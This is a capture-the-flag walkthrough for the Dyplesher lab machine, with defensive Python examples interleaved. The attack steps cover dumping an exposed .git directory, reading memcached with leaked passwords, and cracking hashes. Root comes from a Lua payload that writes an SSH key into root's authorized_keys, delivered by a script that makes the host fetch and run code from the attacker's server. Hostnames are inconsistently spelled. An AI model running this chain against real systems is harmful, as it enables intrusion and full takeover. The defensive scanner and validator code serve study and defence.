Nothing Special

Writeup


Nmap's HTTP scripts flag an exposed .git directory on port 80:

http-enum:
|_  /.git/HEAD: Git folder
|_http-errors: Couldn't find any error pages.
|_http-feed: Couldn't find any feeds.
|_http-fetch: Please enter the complete path of the directory to save data in.
| http-git:
|   10.10.10.190:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: first commit
|     Remotes:
|_      http://localhost:3000/felamos/memcached.git

http://test.dyplasher.htb:3000/felamos/memcached.git

Running git-dumper against 10.10.10.190:80/.git/ recovers the index.php of test.dyplasher.htb.
That file contains the credentials for the memcached service.
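The exposed /.git/ that http-git flagged is what git-dumper then pulled, and a pull like that leaves a recognisable trail in the web server's access log. The following Python is an added example for the defender's side, not part of the writeup or the box: it parses combined-format access log lines (the sample lines are constructed, not real traffic) and reports, per source address, whether VCS paths were only probed (non-2xx responses) or actually served (2xx responses), which is the difference between an attempted and a confirmed repository exposure.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.10.14.5 - - [21/May/2020:10:01:02 +0000] "GET / HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.5 - - [21/May/2020:10:01:03 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)"
10.10.14.5 - - [21/May/2020:10:01:03 +0000] "GET /.git/config HTTP/1.1" 200 312 "-" "Mozilla/5.0"
10.10.14.5 - - [21/May/2020:10:01:04 +0000] "GET /.git/index HTTP/1.1" 200 2048 "-" "python-requests/2.23.0"
10.10.14.5 - - [21/May/2020:10:01:05 +0000] "GET /.git/objects/ab/cd0000000000000000000000000000000000000000 HTTP/1.1" 200 800 "-" "-"
192.168.1.20 - - [21/May/2020:10:02:00 +0000] "GET /.git/HEAD HTTP/1.1" 404 162 "-" "curl/7.68.0"
"""

# One combined-format line: ip ident user [time] "method path proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Any request under these prefixes is a VCS metadata probe; a 2xx means it was served.
VCS_PREFIXES = ("/.git/", "/.svn/", "/.hg/")


def parse_line(line):
    """Return the fields of one log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyze(log_text):
    """Group VCS-path requests by source address and classify each source as
    'probe' (never got a 2xx) or 'exposed' (at least one VCS artifact was served)."""
    findings = defaultdict(lambda: {"probes": 0, "served": 0, "paths": set(), "agents": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(VCS_PREFIXES):
            continue
        f = findings[rec["ip"]]
        f["probes"] += 1
        f["agents"].add(rec["ua"])
        if rec["status"].startswith("2"):
            f["served"] += 1
            f["paths"].add(rec["path"])
    for f in findings.values():
        f["severity"] = "exposed" if f["served"] else "probe"
    return dict(findings)


if __name__ == "__main__":
    for ip, f in analyze(SAMPLE_LOG).items():
        print(f"{ip}: {f['severity']} ({f['served']}/{f['probes']} VCS requests served), "
              f"paths={sorted(f['paths'])}, agents={sorted(f['agents'])}")
```

A source that gets 2xx responses for /.git/HEAD and /.git/index has most likely already reconstructed the repository, so treat it as a confirmed leak of everything in the history, credentials included. The fix is to deny those prefixes in the web server configuration and to keep the checkout's .git directory out of the document root altogether.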

Using python3 and the bmemcached library, we can read the hashed passwords of the users of test.dyplasher.htb:3000 straight out of memcached:

import bmemcached

# Authenticate to memcached (SASL) with the username and password recovered
# from index.php, then read the cached keys.
client = bmemcached.Client(('10.10.10.190:11211',), 'felamos', 'zxcvbnm')
print(client.get('password'))
print(client.get('username'))
print(client.get('email'))

Cracking the bcrypt hash from the password key gives mommy1:
$2y$12$c3SrJLybUEOYmpu1RVrJZuPyzE5sxGeM0ZChDhl8MlczVrxiA3pQK = mommy1

With that password you'll be able to access http://test.dyplasher.htb:3000/felamos/memcached.git
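The foothold above rests on credentials committed to source (the memcached username and password in index.php). The following Python is an added example, not code from the writeup or the box: a small pre-commit style secret scanner that walks a set of files and reports hardcoded credentials, including the Memcached SASL call the writeup's finding hinges on, while skipping obvious placeholders. The sample files, names and values are constructed; the index.php only mimics the shape of the file the writeup describes.

```python
import re

# Constructed sample files (not from the box). index.php mimics the kind of
# hardcoded cache credentials the writeup found; the values are made up.
SAMPLE_FILES = {
    "index.php": (
        "<?php\n"
        "$mc = new Memcached();\n"
        "$mc->addServer('127.0.0.1', 11211);\n"
        "$mc->setSaslAuthData('svc_cache', 'Sup3rSecret!');\n"
        "$greeting = 'hello';\n"
    ),
    "settings.py": (
        "DEBUG = False\n"
        "DATABASE_URL = 'postgres://app:hunter2pass@db.internal:5432/app'\n"
        "API_KEY = os.environ.get('API_KEY')\n"
    ),
    "README.md": (
        "Configure the cache with password: <set via environment>\n"
        "password = 'changeme'\n"
    ),
}

# (kind, regex whose group 1 is the secret value)
PATTERNS = [
    ("memcached SASL password",
     re.compile(r"setSaslAuthData\(\s*['\"][^'\"]*['\"]\s*,\s*['\"]([^'\"]+)['\"]")),
    ("credential in URL",
     re.compile(r"[a-z][a-z0-9+.\-]*://[^/\s:@]+:([^@\s'\"]+)@")),
    ("password-like assignment",
     re.compile(r"(?i)\b(?:password|passwd|pwd|secret|api[_-]?key|token)\b"
                r"\s*(?:=>|=|:)\s*['\"]([^'\"]{4,})['\"]")),
]

PLACEHOLDERS = {"changeme", "password", "secret", "xxx", "example"}


def looks_like_placeholder(value):
    """Template markers and well-known dummy values are not real secrets."""
    v = value.lower()
    return v in PLACEHOLDERS or "${" in v or "{{" in v or v.startswith("<")


def redact(value):
    """Keep a two-character hint so the finding can be located, hide the rest."""
    return value[:2] + "*" * max(len(value) - 2, 3)


def scan_text(name, text):
    """Return one finding per line that carries a non-placeholder secret."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for kind, rx in PATTERNS:
            m = rx.search(line)
            if m and not looks_like_placeholder(m.group(1)):
                findings.append({"file": name, "line": lineno,
                                 "kind": kind, "value": redact(m.group(1))})
                break  # first matching pattern on a line is enough
    return findings


def scan_files(files):
    """Scan a mapping of filename -> contents (e.g. the staged files of a commit)."""
    out = []
    for name, text in files.items():
        out.extend(scan_text(name, text))
    return out


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['file']}:{f['line']}: {f['kind']} ({f['value']})")
```

Run as a pre-commit hook this refuses commits that would put a cache or database password into history; once such a value has reached a repository that later ends up in a web root, as here, rotating the credential is the only remedy, because deleting the file does not remove it from the object store.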

and now you'll be able to access http://test.dyplesher.htb:3000/felamos/gitlab/ as well.
Nothing interesting there, but check out:
http://test.dyplesher.htb:3000/felamos/gitlab/releases

Download repo.zip and extract it.

In it you will find bundle files; each bundle file is a repo.
To extract one, run on every bundle:
git clone --mirror filename repo/.git
cd repo
git init
git checkout

Inside one of the repos you'll find users.db.

Use an sqlite db viewer to open it.
You'll find a password hash.
The password is alexis1.
You can now use it to sign in to dyplesher.htb/login with f's account.
ssh -L 5672:127.0.0.1:5672 felamos@10.10.10.190

password: tieb0graQueg

give rep+ to counter haters

root

2- To get root, on your machine make a file plugin.lua with the contents:
os.execute("echo '[PUB SSH KEY]' >> /root/.ssh/authorized_keys")

Replace [PUB SSH KEY] with your public key, located at /root/.ssh/id_rsa.pub.

3- In the terminal where you saved plugin.lua, start a web server: python3 -m http.server 11211

4- Make a Python file pyth.py in the same directory with the content:
#!/usr/bin/env python3
import pika

# Connect to the RabbitMQ port forwarded over SSH in the step above.
connection = pika.BlockingConnection(
    pika.ConnectionParameters(
        '127.0.0.1',
        5672,
        credentials=pika.PlainCredentials('yuntao', 'EashAnicOc3Op')
    )
)

channel = connection.channel()
# Publish the URL of plugin.lua to the plugin_data exchange.
channel.basic_publish(
    exchange='plugin_data',
    routing_key='',
    body='http://[IP]:11211/plugin.lua'
)
connection.close()

5- Change [IP] to your IP (10.10.x.x).

6- Now execute pyth.py: first install pika with pip3 install pika, then run python3 pyth.py. Finally wait 10 seconds and do:
ssh -i PRIVATE_SSH root@deplysher
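The root step works because something on the box consumes the plugin_data exchange, fetches whatever URL arrives in the message body, and runs the resulting Lua as root. The following Python is an added example of what a hardened consumer would do instead, not code from the writeup or the box: messages are expected as a signed JSON envelope (URL plus the plugin's SHA-256 digest, authenticated with an HMAC over both) rather than a bare URL, the URL must point at an allowlisted HTTPS host, and the downloaded bytes are checked against the digest before anything is executed. The signing key, allowlisted host and sample messages are constructed assumptions; the exchange name plugin_data is the one from the writeup.

```python
import hashlib
import hmac
import json
from urllib.parse import urlparse

# Constructed assumptions (not from the box): the key is shared between the
# trusted publisher and the consumer; only this host may serve plugins.
SIGNING_KEY = b"constructed-shared-secret-rotate-me"
ALLOWED_HOSTS = {"plugins.internal.example"}


def _canonical(url, sha256):
    """Stable byte representation of the fields both sides sign over."""
    return json.dumps({"url": url, "sha256": sha256},
                      sort_keys=True, separators=(",", ":")).encode()


def sign_plugin_message(url, sha256, key=SIGNING_KEY):
    """Publisher side: wrap the URL and expected digest in a signed envelope."""
    mac = hmac.new(key, _canonical(url, sha256), hashlib.sha256).hexdigest()
    return json.dumps({"url": url, "sha256": sha256, "hmac": mac})


def validate_plugin_message(body, key=SIGNING_KEY, allowed_hosts=ALLOWED_HOSTS):
    """Consumer side: return (ok, reason, message). Anything that is not a
    well-formed, correctly signed envelope pointing at an allowlisted HTTPS
    host is rejected before any network fetch happens."""
    try:
        msg = json.loads(body)
    except ValueError:
        return False, "not JSON", None
    if not isinstance(msg, dict) or not all(
            isinstance(msg.get(k), str) for k in ("url", "sha256", "hmac")):
        return False, "missing fields", None
    expected = hmac.new(key, _canonical(msg["url"], msg["sha256"]),
                        hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, msg["hmac"]):
        return False, "bad signature", None
    u = urlparse(msg["url"])
    if u.scheme != "https" or u.hostname not in allowed_hosts:
        return False, "url not allowlisted", None
    return True, "ok", msg


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def verify_plugin_bytes(data, expected_sha256):
    """After download, refuse to load the plugin unless its digest matches the envelope."""
    return hmac.compare_digest(sha256_hex(data), expected_sha256)


if __name__ == "__main__":
    # A bare URL like the one pyth.py publishes is rejected outright.
    raw = "http://10.10.14.5:11211/plugin.lua"  # constructed attacker-style body
    print(raw, "->", validate_plugin_message(raw)[1])

    # A properly signed envelope for an allowlisted host is accepted, and the
    # downloaded bytes are only loaded if their digest matches.
    plugin = b"print('hello from a constructed plugin')"
    good = sign_plugin_message("https://plugins.internal.example/plugin.lua", sha256_hex(plugin))
    ok, reason, msg = validate_plugin_message(good)
    print(msg["url"], "->", reason, "| digest ok:", verify_plugin_bytes(plugin, msg["sha256"]))
```

Two further points follow from the same observation. A consumer that loads third-party code should run as an unprivileged account, so that even a bad plugin cannot write to /root/.ssh; and the RabbitMQ account used to publish to plugin_data should be scoped to that one exchange, so that a leaked user credential does not double as a code-execution channel.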
